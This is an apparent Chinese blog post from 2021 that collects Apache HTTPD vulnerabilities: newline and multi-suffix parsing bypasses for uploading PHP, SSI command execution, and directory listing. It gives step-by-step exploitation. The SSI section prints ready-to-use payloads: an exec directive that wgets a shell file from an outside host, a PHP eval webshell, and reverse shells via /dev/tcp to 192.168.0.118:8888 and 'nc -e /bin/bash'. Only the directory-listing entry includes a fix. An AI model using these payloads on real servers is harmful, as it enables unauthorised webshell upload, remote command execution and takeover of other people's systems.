apache漏洞汇总

 

ID

技术描述

利用场景/条件

过程

参考

武器库关联

S1 Apache换行解析漏洞

Apache 2.4.0~2.4.29

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

利用方法:

burp抓包,在Hex选项卡.php后面0d的位置右键-Insert byte,添加一个0a,然后发包,成功上传

 

 

浏览器访问 /x.php%0A,正常解析

 

 

https://www.cnblogs.com/leixiao-/p/10223090.html  
S2 Apache多后缀解析漏洞 使用module模式与php结合的所有版本 apache存在未知扩展名解析漏洞,使用fastcig模式与php结合的所有版本apache不存在此漏洞。

php本身可以解析: .php3 .php5 .pht .phtml 等等。。。。
apache解析文件从后往前解析 例如:1.php.xxx.aaa 从aaa向前解析,遇到认识的后缀如php则交给php处理。
apache : mime.typs 文件写了apache认识的后缀
漏洞产生条件:
1、apache使用module模式 :在httpd.conf中设置

 

 

2、运维人员在配置服务器时,为了使Apache能够解析PHP,而自己添加了一个handler :AddHandler application/x-httpd-php .php
window下路径:Apache\conf\extra\httpd-php.conf

 

 

上传1.php.aaaa 访问1.php.aaaa 解析成功:

 

 

https://blog.csdn.net/weixin_45427650/article/details/105202486  
S3 Apache SSI远程命令执行漏洞

影响版本:Apache全版本(支持SSI与CGI)

 

漏洞原理
SSI(server-side includes):是放置在HTML页面中的指令,它可以将动态生成的内容添加到现有的HTML页面,而不必通过CGI程序或其他动态技术来提供整个页面。以上是定义采用在Apache官网对SSI的定义,说白了就是可以在HTML中加入特定的指令,也可以引入其他的页面。开启SSI需要单独配置Apache,可以参考SSI配置。
SSI可以完成查看时间、文件修改时间、CGI程序执行结果、执行系统命令、连接数据库等操作,功能非常强大。
我们要利用的就是SSI执行系统命令的功能,正常的一个包含SSI指令的文件,可以如下内容:

<pre>
<!--#exec cmd="whoami" -->
</pre>
文件名保存为test.shtml,这个后缀取决于Apache的配置,默认是此后缀。
当后台对扩展名校验不严格时,可以上传此类型文件,达到执行命令,获取webshell的目的。执行效果:

 

 


上传webshell:

<!--#exec cmd="wget http://xxx/shell.txt | rename shell.txt shell.php" -->
echo '<?php @eval($_POST[margin]);?>' > shell.php
反弹shell:

<!--#exec cmd="/bin/bash -i > /dev/tcp/192.168.0.118/8888 0<&1 2>&1" -->
<!--#exec cmd="nc x.x.x.x 8888 -e /bin/bash"-->

https://zhuanlan.zhihu.com/p/125115734  
S4 apache目录遍历

在httpd.conf文件:

Options + Indexes + FollowSymLinks + ExecCGI

漏洞特征:intitle:index of

在httpd.conf文件中找到 Options +Indexes +FollowSymLinks +ExecCGI 并修改成 Options -Indexes+FollowSymLinks +ExecCGI 并保存

https://blog.csdn.net/weixin_45427650/article/details/105202486  
posted @ 2021-10-11 15:45  梦幻泡影离殇  阅读(971)  评论(0编辑  收藏  举报